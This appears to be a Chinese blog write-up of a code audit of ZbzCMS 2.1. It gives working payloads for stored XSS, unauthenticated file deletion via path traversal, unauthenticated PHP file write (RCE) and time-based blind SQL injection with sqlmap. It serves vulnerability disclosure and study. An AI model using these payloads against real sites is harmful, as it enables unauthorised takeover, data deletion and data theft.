ZbzCMS 2.1代码审计

  • ZbzCMS 2.1代码审计

    • 漏洞复现

    • 漏洞复现

    • 漏洞复现

    • 漏洞复现

    • 存储型XSS

    • 前台任意文件删除

    • 前台未授权RCE

    • 前台Mysql盲注

ZbzCMS 2.1代码审计

源码下载: https://pan.baidu.com/s/1DOFYZKdTAlpPiZ-MwEVXFw

存储型XSS

定位到一处存储XSS:
/cms/common/php/ajax.php

图片

漏洞复现

/cms/common/php/ajax.php?run=liuyan处抓包
构建payload:

 
  1. POST传入:

  2. diaoyongbiaoqian=hacker&neirong=<script>alert("what the hack")</script>&leixing=1.1.1.1

图片


后台查看XSS是否生效

图片

前台任意文件删除

定位到一处可能存在文件删除的漏洞
/cms/cms/include/up.php

图片

在删除文件的操作中没有进行权限的识别

图片

漏洞复现

测试删除hellword.txt文件

图片


/cms/cms/include/up.php?run=del处抓包
构造payload:

 
  1. POST传入

  2. url=../../../helloword.txt

图片


放包后可以看到helloword.txt已经被删除

图片

前台未授权RCE

/cms/cms/admin/run_ajax.php 第461-470行
存在文件编辑保存操作

图片

漏洞复现

传入Path neirong参数即可构成任意文件读写/创建操作
Payload:(在根目录写入一个hello.php文件):

 
  1. POST /cms/cms/admin/run_ajax.php?run=wenjian_edit HTTP/1.1

  2. path=../../../hello.php&neirong=<?php phpinfo();?>

/cms/cms/admin/run_ajax.php?run=wenjian_edit处抓包

图片


放包后可以看到生成了hello.php文件

图片


访问hello.php成功

图片

前台Mysql盲注

对代码进行复审,发现 /cms/common/php/ajax.php 存在SQL注入

图片

漏洞复现

payload:
(这里是直接使用了sqlmap的payload)

run=ad&id=3 AND (SELECT 3437 FROM (SELECT(SLEEP(5)))QQHn)

图片

使用sqlmap

python sqlmap.py -u "http://x.x.x.x//cms/common/php/ajax.php?run=ad&id=3" -p id

  

图片

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

免费领取安全学习资料包!


渗透工具

技术文档、书籍

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

应急响应笔记

学习路线

  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值